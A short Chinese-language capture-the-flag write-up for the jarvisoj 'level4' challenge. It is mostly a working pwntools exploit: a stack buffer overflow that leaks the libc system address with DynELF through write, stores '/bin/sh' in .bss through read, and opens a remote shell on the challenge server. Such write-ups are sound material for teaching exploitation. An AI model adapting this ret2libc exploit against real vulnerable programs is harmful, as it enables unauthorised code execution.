这道题只出现了read函数以及write函数。checksec也只发现了NX。
这次并没有给出libc的文件,所以我们可以考虑使用pwntools中的DynELF泄漏system地址,然后将'/bin/sh'写入.bss段中保存,在调用system函数的时候载入.bss保存的相应地址即可
exp如下
from pwn import *
context(os='linux',arch='i386',log_level='debug')
#p=process('./level4')
p=remote('pwn2.jarvisoj.com',9880)
e=ELF('./level4')
write_plt=e.symbols['write']
read_plt=e.symbols['read']
vul_addr=0x804844b
bss_addr=0x804a024
def leak(addr):
payload1='a'*0x8c+p32(write_plt)+p32(vul_addr)+p32(1)+p32(addr)+p32(4)
p.sendline(payload1)
data=p.recv(4)
return data
d=DynELF(leak,elf=e)
system_addr=d.lookup('system','libc')
payload2='a'*0x8c+p32(read_plt)+p32(vul_addr)+p32(0)+p32(bss_addr)+p32(8)
p.sendline(payload2)
p.send('/bin/sh\x00')
payload3='a'*0x8c+p32(system_addr)+p32(0xdeadbeef)+p32(bss_addr)
p.sendline(payload3)
p.interactive()